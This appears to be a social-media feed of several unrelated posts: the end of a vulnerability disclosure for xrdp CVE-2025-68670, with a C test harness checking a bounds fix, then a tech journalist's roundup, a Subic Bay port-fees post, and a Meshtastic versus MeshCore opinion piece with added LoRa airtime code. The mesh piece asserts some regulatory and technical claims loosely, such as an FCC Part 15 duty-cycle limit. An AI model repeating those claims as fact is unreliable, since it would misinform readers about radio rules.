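        return DOMAIN_TOO_LONG;
    }
    memcpy(result, start, seg_len);
    result[seg_len] = '\0';
    return DOMAIN_OK;
}

/* Destination followed by guard bytes, so a write past the end is visible. */
struct guarded {
    char result[RESULT_BUF_LEN];
    unsigned char guard[16];
};

/*
 * Constructed input: '_' + seg_len filler bytes + "__0". Returns the number
 * of bytes copied on success, the negative status on rejection, or
 * GUARD_DAMAGED if any byte after the destination changed.
 */
static int case_result(size_t seg_len)
{
    char domain[INFO_CLIENT_MAX_CB_LEN];
    struct guarded g;
    size_t i;
    int status;

    if (seg_len > sizeof(domain) - 5) seg_len = sizeof(domain) - 5;
    domain[0] = '_';
    memset(domain + 1, 'x', seg_len);
    memcpy(domain + 1 + seg_len, "__0", 4); /* copies the terminator too */

    memset(g.guard, 0xA5, sizeof(g.guard));
    status = parse_domain_bounded(domain, g.result, sizeof(g.result));
    for (i = 0; i < sizeof(g.guard); ++i) {
        if (g.guard[i] != 0xA5) return GUARD_DAMAGED;
    }
    return status == DOMAIN_OK ? (int)strlen(g.result) : status;
}

static char demo_out[RESULT_BUF_LEN];

int main(void)
{
    printf("8 -> %d, 255 -> %d, 256 -> %d, 507 -> %d\n",
           case_result(8), case_result(255), case_result(256),
           case_result(507));
    printf("status %d, result \"%s\"\n",
           parse_domain_bounded("_10.0.0.1__2", demo_out, sizeof(demo_out)),
           demo_out);
    return 0;
}
```

The boundary sits exactly at 255 bytes: that segment plus its terminator fills the 256-byte buffer, and anything longer is refused before a single byte is written.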

    Vulnerability remediation timeline


    • 12/05/2025: we submitted the vulnerability report via github.com/neutrinolabs/xrdp/s…
    • 12/05/2025: the project maintainers immediately confirmed receipt of the report and stated they would review it shortly.
    • 12/15/2025: investigation and prioritization of the vulnerability began.
    • 12/18/2025: the maintainers confirmed the vulnerability and began developing a patch.
    • 12/24/2025: the vulnerability was assigned the identifier CVE-2025-68670.
    • 01/27/2026: the patch was merged into the project’s main branch.


    Conclusion


    Taking a responsible approach to code not only makes our own products more solid but also enhances popular open-source projects. We have previously shared how security assessments of KasperskyOS-based solutions – such as Kaspersky Thin Client and Kaspersky IoT Secure Gateway – led to the discovery of several vulnerabilities in Suricata and FreeRDP, which project maintainers quickly patched. CVE-2025-68670 is yet another one of those stories.

    However, discovering a vulnerability is only half the battle. We would like to thank the xrdp maintainers for their rapid response to our report, for fixing the vulnerability, and for issuing a security bulletin detailing the issue and risk mitigation options.

    securelist.com/cve-2025-68670/…

  10. CVE-2025-68670: discovering an RCE vulnerability in xrdp

    securelist.com/cve-2025-68670/…

  11. This workweek felt longer than usual because Thursday had me going to Dallas and back for an upcoming story. As booked, this itinerary would have put about 17 hours between my stepping off my front porch in the morning and returning to my house late at night, but as flown it returned me home three hours later than planned, almost 21 hours after I’d woken up. Patreon readers, I hope you will enjoy my upcoming recap of that prolonged day.

    7/22/2024: Why the Tech Industry Refuses to Learn From Disastrous Outages, The New Republic

    A friend filling in at TNR–the same one who helped me get my first byline at that publication last July–asked if I could turn around a post about lessons from the CrowdStrike calamity. I said I could, received an editorial green light for my pitch at 11:37 a.m., got useful quotes from three of six subject-matter experts I’d hit up for comment, and filed the piece at 5 p.m. sharp.

    7/23/2024: TikTok, YouTube Battle for Satisfaction Supremacy, Facebook Hate Calms a Bit, PCMag

    In my latest coverage of the American Customer Satisfaction Index’s ratings of social-media and search-engine firms, I called out the contradiction between search operators having such closely-spaced satisfaction rankings and Google’s overwhelming dominance of the market.

    7/23/2024: Sydney Sweeney’s X Account Reportedly Hijacked Via (Yet Another) SIM Swap, PCMag

    The celebrity angle didn’t make me want to cover the account takeover that 404 Media’s Joseph Cox reported, but seeing a telecom carrier once again apparently fall prey to a SIM-swap attack made me want to remind readers that this risk is not going away. And that they should not depend on text-message-based two-factor authentication for the most important accounts in their lives.

    7/24/2024: Buttigieg Plays the Long Game on EVs, But He’s Not Sold on the Cybertruck, PCMag

    I didn’t have Tuesday night’s Axios event featuring Secretary Pete on my calendar until Monday, when an e-mail from that publication listed it among other upcoming events. I was pleasantly surprised to see that it hadn’t hit capacity by the time I signed up.

    7/26/2024: Senators: Your Driving Data May Have Been Sold For as Little as 26 Cents, PCMag

    Two days later, I returned to the topic of cars to cover how Sens. Ed Markey (D.-Mass.) and Ron Wyden (D.-Ore.) documented how readily and how cheaply some car manufacturers will sell off driving-behavior data to data brokers.

    https://robpegoraro.com/2024/07/28/weekly-output-tech-monocultures-social-media-satisfaction-sim-swap-attacks-pete-buttigieg-connected-cars-and-data-brokers/

    #ACSI #connectedCarPrivacy #connectedCars #CrowdStrike #electricCars #EVs #ITMonoculture #PeteButtigieg #searchEngines #SIMSwap #socialMediaSatisfaction #SydneySweeney #TNR #XAccountTakeover

  14. Temporary Reduced Fees And Support For Port Clients Confirmed By SBMA

    In response to the spiked fuel prices and other economic uncertainties, the Subic Bay Metropolitan Authority (SBMA) announced that it will temporarily offer reduced fees and provide financial support to its port clients.

    To put things in perspective, posted below is an excerpt from the official announcement by the SBMA. Some parts in boldface…

    The Subic Bay Metropolitan Authority (SBMA) has temporarily taken measures to provide port clients with the much-needed financial support, amid the ongoing rise in fuel costs in the global market.

    SBMA Chairman and Administrator Eduardo Jose L. Aliño explained that this is in line with President Ferdinand R. Marcos Jr.’s Executive Order No. 110, which immediately placed the entire country in a state of national energy emergency due to geopolitical tensions in the Middle East.

    Aliño added that such temporary measures aim to provide aid to industries affected by the Middle East crisis by ensuring that cost-stabilizing strategies for the transport and food sectors are implemented without delay. 

    “These initiatives, including reduced fees and extended free storage, provide a fiscal cushion to reinforce investor confidence and prevent supply chain bottlenecks,” said Aliño.

    He also cited that key industry participants namely, importers, suppliers, consignees, vessel owners, and consumers, will experience the impact of these measures through their respective counterparts – terminal operators, cargo handlers, brokers, consolidators, processors, ship agents, and shipping lines, resulting in a cascading effect throughout the supply chain.

    As part of this initiative, the SBMA will implement a five percent tariff reduction on all commercial vessels, including harbor fees, berthing fees/ anchorage fees, and harbor cleaning fees, as well as a five percent tariff reduction on cargo charges including wharfage fees, and storage fees.

    “We will also implement a five percent tariff reduction on SBMA shares such as pilotage fee, hauling services, tugboat services, heavy equipment rental, line handling services, chandling services, water tendering, cargo handling for containerized cargo, and bunkering services,” he added.

    Additionally, the SBMA is also offering free storage for non-containerized cargo, and free storage period for an additional 2-day extension.

    To further aid port clients, the SBMA will temporarily suspend the collection of shares from terminal operators/cargo handlers for liquid bulk cargo handling and related activities; the implementation of the one percent admission fee for liquid bulk; and the implementation of the ten percent increase on cargo handling and miscellaneous charges of non-containerized/ general cargoes.

    Chairman Aliño assured port stakeholders that these measures shall take effect immediately upon its approval and ratification by the SBMA Board of Directors, adding that these will remain in force until geopolitical tensions subside, at which point they shall be lifted via a formal issuance following Board approval.

    Let me end this post by asking you readers: What is your reaction to this recent development? Do you think this new move by the SBMA will be sufficient enough for the port clients and keep economic activity in the freeport growing? Do you think the SBMA will have to further intensify its tourism activities to attract more high-spending tourists to bounce back from a potential economic downturn?

    You may answer in the comments below. If you prefer to answer privately, you may do so by sending me a direct message online.

    #ASEAN #Asia #AssociationOfSoutheastAsianNationsASEAN #Bing #Blog #blogger #blogging #BongbongMarcos #business #businessNews #CarloCarrasco #ChatGPT #economicDynamism #economicGrowth #economics #economy #EconomyOfSubicBay #EconomyOfThePhilippines #EduardoJoseLAliño #energy #Facebook #foreignInvestment #foreignInvestors #foreignTourists #fuel #geek #Google #GoogleSearch #governance #holiday #Instagram #Investagrams #investment #investors #localTourists #Marcos #news #oil #Philippines #PhilippinesBlog #Pinoy #portOperations #PresidentMarcos #publicService #SBMA #socialMedia #SoutheastAsia #SubicBay #SubicBayFreeportZone #SubicBayMetropolitanAuthoritySBMA #technology #tourism #tourismBlog #tourists #travel #travelBlog #Tumblr #Twitter #WordPress #WordPressCom
  18. The Broken Mesh: Why the Fight Between Meshtastic and MeshCore Matters

    The fracture between the Meshtastic and MeshCore projects is a warning that you cannot ignore. For years, people thought a simple, off-grid data net was the answer for when the main lines go down. But now, the community is divided. This is not just a small fight over code. It is a total disagreement on how to handle communication when things get ugly. If you think you are ready just because you bought a cheap radio board and did not bother to learn how the software actually works, you are just a hobbyist playing with toys. The rift between Meshtastic and MeshCore shows how fragile these systems are and why you need to know your gear inside and out. A mesh net is only as good as its weakest link. If you do not master the tech, you are just a dead node in a silent town. We are seeing the growing pains of a decentralized technology that is outstripping the discipline of its users. You must choose your tools based on the reality of the physics, not the popularity of the app. Demand that your firmware be an efficient tool for data transmission, not a bloated social media platform for the 915 MHz band. If you do not take the time to understand the modulation, the packet structure, and the routing logic of the software you flash onto your hardware, you are just a child playing with a walkie-talkie while the grown-ups are trying to build a grid. Mastery of the radio spectrum is not an option; it is a requirement for anyone who claims to be prepared. This split is the first real test of whether civilian mesh can survive the chaos of its own success. You either learn to navigate the airwaves or you signal your own failure. Every packet you send without understanding the cost is a round wasted in a firefight. Stop treating your emergency comms like a smartphone app and start treating it like the life-support system it is. This technical mastery is the difference between a working link and a radio that does nothing but drain your battery in the dark.

    Troubleshooting LoRa Mesh Protocol Inefficiency and Network Congestion

    The fight between Meshtastic and MeshCore comes down to how they use the radio waves and the small chips that run them. Meshtastic has been the big name for a long time. It uses a flooding method where every radio repeats every message it hears. In the woods, that is fine. In a city with a hundred users, it is a train wreck. The air gets crowded, messages hit each other, and the whole system jams itself. MeshCore did not start because people wanted a new app. It started because the old way is inefficient. The core of the split is about the overhead—the extra data that hitches a ride on every message. Meshtastic adds a lot of features, but those features take up space. MeshCore wants to strip everything down to the bone so the network stays stable. When you have very little room to send data, every extra bit is a mistake. This is a battle between lots of features and it just has to work. If your software is fighting your hardware, you lose. The divergence between Meshtastic and MeshCore is rooted in the physics of the 900 MHz ISM band and the limitations of the ESP32 and nRF52 chipsets. As the node count grows, the airwaves become a chaotic mess of collisions and retransmissions, effectively jamming the very frequency the operators are trying to utilize. While Meshtastic has focused on a feature-rich user experience with a heavy reliance on a specific structure, MeshCore proponents argue for a leaner, more modular approach that prioritizes the stability of the underlying mesh over the bells and whistles of the interface. When you are operating on a low-bandwidth, high-latency medium like LoRa, every byte of overhead is a liability. You either master the protocol or you become a dead node. The math does not lie even if the marketing does. If your network protocol consumes more than ten percent of your bandwidth for heartbeats, your network is dying. Every extra feature in the code is another potential point of failure when the signal gets weak. 
You have to decide if you want a chat app or a survival tool. The flooding algorithm used by Meshtastic is a blunt instrument that was never meant for high-density urban deployment. It works by simply re-broadcasting every unique packet received until a hop limit is reached. In a sparse environment, this ensures the message gets through by any means necessary. But as the number of nodes increases, the probability of two nodes transmitting at the same time goes up. This leads to packet collisions where neither message is readable. MeshCore attempts to solve this by moving toward a more structured routing system. This means the software tries to figure out the best path for a message instead of just yelling it to everyone. This shift requires a level of technical discipline that many casual users find frustrating. It means the network is less plug-and-play and more of a precision tool. If you want a network that survives a real crisis, you have to move away from the chaos of flooding. You have to understand how the Media Access Control layer handles traffic. You have to know how to set your timing parameters so you are not stepping on your own neighbors. The split is a clear line in the sand between those who want ease of use and those who want engineering reliability. You cannot hide from the physics of the airwaves. Either your packets move or they die in the dirt. Stop assuming the software will fix your bad placement. Fix the engineering or get off the air.
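
The scaling argument above can be put into numbers. This is an added example, not code from the post or from either firmware project: it counts transmissions per message for the plain rebroadcast-until-hop-limit flooding the text describes against one transmission per hop for routed delivery, then feeds both into a pure-ALOHA collision estimate. The two topologies, the 6 messages per node per hour and the 0.3 s airtime are assumptions chosen for illustration; rebroadcast suppression and channel-activity detection are not modelled.

```python
import math
from collections import deque

def full_mesh(n):
    """Constructed dense-urban case: all n nodes hear each other."""
    return {i: [j for j in range(n) if j != i] for i in range(n)}

def line_mesh(n):
    """Constructed sparse case: a chain where each node hears only its neighbours."""
    return {i: [j for j in (i - 1, i + 1) if 0 <= j < n] for i in range(n)}

def flood_transmissions(adj, src, hop_limit):
    """Transmissions for one message when every node repeats each new packet once."""
    seen, queue, tx = {src}, deque([(src, hop_limit)]), 0
    while queue:
        node, hops_left = queue.popleft()
        tx += 1                               # this node keys up once
        for nbr in adj[node]:
            if nbr not in seen:
                seen.add(nbr)                 # first copy heard by nbr
                if hops_left > 0:             # hop limit not yet exhausted
                    queue.append((nbr, hops_left - 1))
    return tx

def routed_transmissions(adj, src, dst):
    """Transmissions along a shortest path found by BFS: one per hop."""
    dist, queue = {src: 0}, deque([src])
    while queue:
        node = queue.popleft()
        if node == dst:
            return dist[node]
        for nbr in adj[node]:
            if nbr not in dist:
                dist[nbr] = dist[node] + 1
                queue.append(nbr)
    return None                               # destination unreachable

def delivery_probability(n_nodes, msgs_per_node_per_hour, tx_per_msg, airtime_s):
    """Pure-ALOHA estimate exp(-2G); G = packets offered per packet-time
    inside one collision domain (assumed model, no carrier sensing)."""
    g = n_nodes * msgs_per_node_per_hour / 3600 * tx_per_msg * airtime_s
    return math.exp(-2 * g)

if __name__ == "__main__":
    for n in (10, 50, 100):
        adj = full_mesh(n)
        for label, k in (("flood", flood_transmissions(adj, 0, 3)),
                         ("routed", routed_transmissions(adj, 0, n - 1))):
            p = delivery_probability(n, 6, k, airtime_s=0.3)
            print(f"n={n:3d} {label:6s} tx/msg={k:3d} P(clean)={p:.3f}")
```

In the chain topology flooding and routing cost the same number of transmissions, which is the "in the woods, that is fine" case; in the full mesh the flooded load grows with the square of the node count.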

    Physics of LoRa Packet Collisions and Signal to Noise Ratio Analysis

    To understand this split, you have to look at how these radios actually talk. They use a low-power system called LoRa. It is built for long range, but it is slow. There are strict rules on how long you can broadcast before you have to shut up and let others speak. Because Meshtastic repeats everything, adding more people makes the problem worse fast. This is not a glitch. It is physics. MeshCore was built to change how messages find their path through the net. Instead of everyone yelling at once, it wants a smarter way to move data that does not waste airtime. The split happened because one group likes the safety of repeating everything, while the other wants a clean, quiet network. If your radio is spending eighty percent of its power just saying I am here, you are not communicating—you are just making noise. The split proves that the current path is heading for a crash where no one can get a message through. LoRa is designed for long-range, low-power communication, but it is inherently limited by the Duty Cycle regulations of the FCC Part 15 and similar international bodies. Meshtastic’s current implementation of the flooding protocol means that as you add more users, the probability of packet storms increases exponentially. MeshCore was conceptualized to address the need for a more rigid, perhaps even more disciplined, routing logic that could potentially mitigate the hidden node problem and reduce the airtime usage per packet. The technical fallout between the two development paths stems from a disagreement on how to manage the limited airtime of the ISM band. One camp believes in the resilience of redundant flooding, while the other seeks a more surgical, routed approach to data delivery. This is a matter of Spectral Efficiency. If your mesh is using the majority of its available airtime just to say it exists, you have failed as an operator and an engineer. You are polluting the spectrum with digital noise. 
This noise prevents emergency traffic from getting through. It creates a false sense of security where people think they have a working link when they actually have a jammed one. You must look at the duty cycle of your own node. If you are transmitting more than one percent of the time in the 900 MHz band, you are likely part of the problem. MeshCore is an attempt to force the network into a more responsible state. It prioritizes the survival of the link over the convenience of the user. This is a hard truth that many do not want to hear. Physics does not care about your feelings or your user interface. It only cares about the signal-to-noise ratio. If your signal is lost in the noise of your own network, you have built nothing but a very expensive paperweight. Every packet sent is a risk. In a real-world scenario, a long transmission can be used to find your location. Flooding makes this risk much higher because your message is repeated over and over by every node in the area. A routed system like what MeshCore aims for reduces this risk by limiting the number of times a message is sent. This is not just about efficiency; it is about security. You have to understand that the airwaves are a shared resource. If you treat them like your own personal garbage dump, you will find yourself alone and unheard when the time comes to actually send a call for help. The split between Meshtastic and MeshCore is a debate over the very future of private, off-grid data. One side wants to make it accessible to everyone, while the other wants to make it work when nothing else does. You have to decide which side of that line you stand on. If you are not monitoring your packet loss and your noise floor, you are not an operator. You are just a passenger in a system that is bound to fail. Stop looking at the colorful screens and start looking at the spectrum. The truth is in the waterfall, not the icons. The physics of 915 MHz demand respect that a plug and play mindset cannot provide.

    Off-Grid Communication Solutions and Technical Radio Discipline

    The result of this fight is a mess where gear running one software will not talk to gear running the other. For you, that means your radio is a brick if your neighbor is on the other side of the fence. This is how a mesh net dies. A mesh needs everyone to speak the same language. When the builders split, the network breaks. This should wake up anyone who thinks they can just download a file and be safe. The hard truth is that we are seeing a new tech grow too fast for the people using it. You have to pick your tools based on facts, not what looks cool. Demand software that moves data fast and clean. If you do not know how your radio sends a packet or why some settings work better than others, you have no business relying on this in a pinch. The split between Meshtastic and MeshCore is a reminder that in the world of radio, there are no shortcuts. For the operator in the field, this means your gear might be useless if the person three blocks away is running a different branch of the protocol. This is the death of a mesh. A mesh requires a common language, a shared set of timing parameters, and a unified understanding of frequency hopping and spreading factors. When the developers split, the network breaks. This should serve as a wake-up call to anyone who thinks they can outsource their emergency communications to a GitHub repository they do not understand. The split between Meshtastic and MeshCore is a reminder that in the world of RF, there are no shortcuts. If you cannot explain the difference between a Spreading Factor of seven and twelve, or why a 125kHz bandwidth is preferable over 250kHz in a high-noise environment, you have no business relying on these tools. The hard truth is that we are witnessing the growing pains of a decentralized technology that is outstripping the discipline of its users. You must take personal responsibility for your station. This means testing your range with real-world obstacles. 
It means understanding how your antenna height and gain affect your local mesh. It means being able to re-flash your firmware in the dark while the rain is pouring down. If you cannot do these things, you are not prepared. You are just a collector of electronic gadgets. The discipline of the amateur radio spirit must be applied to these new digital modes. We are losing the technical edge that made the license worth having in the first place. The split is a chance to reset. It is a chance to move away from the appliance operator mindset and back toward the engineering mindset. You should be auditing your own mesh. Look at the traffic logs. See how many packets are being dropped. See how much of your traffic is just node discovery overhead. If you find that your network is inefficient, do not wait for a developer to fix it. Change your settings. Educate your neighbors. If the split leads to a better, more efficient protocol, then it was worth the friction. But if it just leads to two broken networks instead of one, then we have all lost. The practical application of this knowledge is simple: test everything. Do not assume your mesh will work because the light on the board is green. Prove it. Send data over the longest possible path. Monitor the battery drain. Watch the spectrum on an analyzer if you have one. If you do not have the tools to verify your network, you do not have a network. You have a hope. And hope is not a plan for communication. Secure your nodes, harden your protocol, and stop relying on software you have never bothered to read. The day is coming when the only thing between you and the void is the connection you built yourself. Don’t let it be a connection built on laziness. Clean up your messy node or accept that you will be silent when it matters.
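
The one-percent duty-cycle check, the SF7 versus SF12 and 125 kHz versus 250 kHz questions, and the traffic-log audit raised above can all be worked from the LoRa airtime formula. This is an added example, not code from the post or from Meshtastic or MeshCore; it uses the time-on-air formula and SNR limits from Semtech's SX127x datasheet. The 6 dB noise figure, the coding rate and preamble defaults, the packet kinds and the `SAMPLE_LOG` traffic are assumptions constructed for illustration.

```python
import math

# Demodulator SNR floor per spreading factor in dB (Semtech SX127x datasheet).
SNR_LIMIT_DB = {7: -7.5, 8: -10.0, 9: -12.5, 10: -15.0, 11: -17.5, 12: -20.0}

# Constructed one-hour log for one node: (packet kind, payload bytes).
SAMPLE_LOG = [("nodeinfo", 40)] * 12 + [("position", 24)] * 4 + [("text", 32)] * 6

def time_on_air(payload_len, sf, bw_hz, cr=1, preamble=8, header=True, crc=True):
    """Packet airtime in seconds; cr=1 means coding rate 4/5."""
    t_sym = (2 ** sf) / bw_hz
    ldro = 1 if t_sym > 0.016 else 0      # low-data-rate optimisation above 16 ms
    bits = 8 * payload_len - 4 * sf + 28 + 16 * int(crc) - 20 * int(not header)
    n_payload = 8 + max(math.ceil(bits / (4 * (sf - 2 * ldro))) * (cr + 4), 0)
    return (preamble + 4.25 + n_payload) * t_sym

def sensitivity_dbm(sf, bw_hz, noise_figure_db=6.0):
    """Weakest decodable signal: thermal noise in bw_hz + receiver NF + SNR floor."""
    return -174 + 10 * math.log10(bw_hz) + noise_figure_db + SNR_LIMIT_DB[sf]

def max_packets_per_hour(airtime_s, duty_cycle=0.01):
    """How many packets of this airtime fit in an hour at the given duty cycle."""
    return int(3600 * duty_cycle / airtime_s)

def audit(log, sf, bw_hz, window_s=3600):
    """Return (duty cycle, share of airtime that is not user text) for one node."""
    total = overhead = 0.0
    for kind, length in log:
        t = time_on_air(length, sf, bw_hz)
        total += t
        overhead += t if kind != "text" else 0.0
    return total / window_s, (overhead / total if total else 0.0)

if __name__ == "__main__":
    for sf, bw in ((7, 125e3), (7, 250e3), (12, 125e3), (12, 250e3)):
        toa = time_on_air(32, sf, bw)
        duty, share = audit(SAMPLE_LOG, sf, bw)
        print(f"SF{sf} {bw / 1e3:.0f} kHz: {toa * 1e3:7.1f} ms/pkt, "
              f"{sensitivity_dbm(sf, bw):.1f} dBm, "
              f"{max_packets_per_hour(toa)}/h at 1%, "
              f"duty {duty:.2%}, overhead {share:.0%}")
```

Doubling the bandwidth halves the airtime but raises the noise floor by about 3 dB, and the same constructed log that stays far below one percent at SF7 exceeds it at SF12 with most of the airtime spent on non-text packets.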

    Conclusion: The Future of Decentralized Mesh Networks and User Mastery

    The discipline of the old-school radio operator has to be applied here or the whole thing will fail. The split between Meshtastic and MeshCore is a call to stop being a lazy user and start being a real operator. We do not have time for good enough when the grid is down. Check your gear, learn the rules of the airwaves, and be ready for a future where the channels are full and the software is broken. Build your setup expecting things to break. There is no room for being soft. Learn the math, understand your range, and make sure every message you send is worth the airtime. The grid is weak, the airwaves are crowded, and your own lack of knowledge is the only thing truly blocking your signal. Fix your gear, learn the system, and stop waiting for someone else to save you. The grid is fragile, the spectrum is finite, and your ignorance is the only thing standing between you and a total blackout. Fix your station, fix your protocol, and stop waiting for someone else to secure your link. The time for playing games with digital toys is over. Mastery is the only way forward. Master the code, master the RF, or stay off the air. This hobby demands engineers, not appliance operators. Be the asset the network needs, not the QRM that kills it. Finalize your build, test the link, and maintain the discipline required to keep the airwaves open for those who truly need them.

    Call to Action

    Join the Network and Master Your Comms Before the Grid Goes Dark. The split between Meshtastic and MeshCore is a wake-up call for every operator. You cannot afford to be a passive user when the lines of communication are at stake. Whether you choose the feature-rich path or the lean efficiency of the core, the responsibility for a working link lies with you. Don’t wait for a crisis to realize your nodes are misconfigured or your protocol is inefficient. Start auditing your setup today by getting out in the field to find your real-world limits, diving into the spreading factors to clear the noise, and educating your local mesh to ensure your neighborhood stays connected. The airwaves belong to those who master them. Secure your hardware, flash your firmware, and become a reliable node in the decentralized future. Join the conversation, build the grid, and stay off the silent list.

    D. Bryan King

    Disclaimer:

    The views and opinions expressed in this post are solely those of the author. The information provided is based on personal research, experience, and understanding of the subject matter at the time of writing. Readers should consult relevant experts or authorities for specific guidance related to their unique situations.

    #915MHz #airtimeOptimization #AmateurRadio #antennaGain #bandwidthManagement #communicationSecurity #communityMesh #constrainedNodes #dataTransmission #DecentralizedNetworks #digitalModes #DisasterRecovery #dutyCycle #emergencyComms #ESP32 #FCCPart15 #firmwareFlashing #floodingProtocol #gridDownComms #hiddenNodeProblem #IoTScalability #ISMBand #linkBudget #LoRa #LoRaWAN #meshNetworking #MeshCore #Meshtastic #networkCongestion #nodeDensity #nRF52840 #offGridCommunication #packetCollisions #packetLoss #protocolOverhead #radioDiscipline #radioFrequency #RFEngineering #RFInterference #routingLogic #signalPropagation #SignalToNoiseRatio #SNR #spectralEfficiency #spreadingFactor #survivalTech #SX1262 #TacticalComms #wirelessProtocols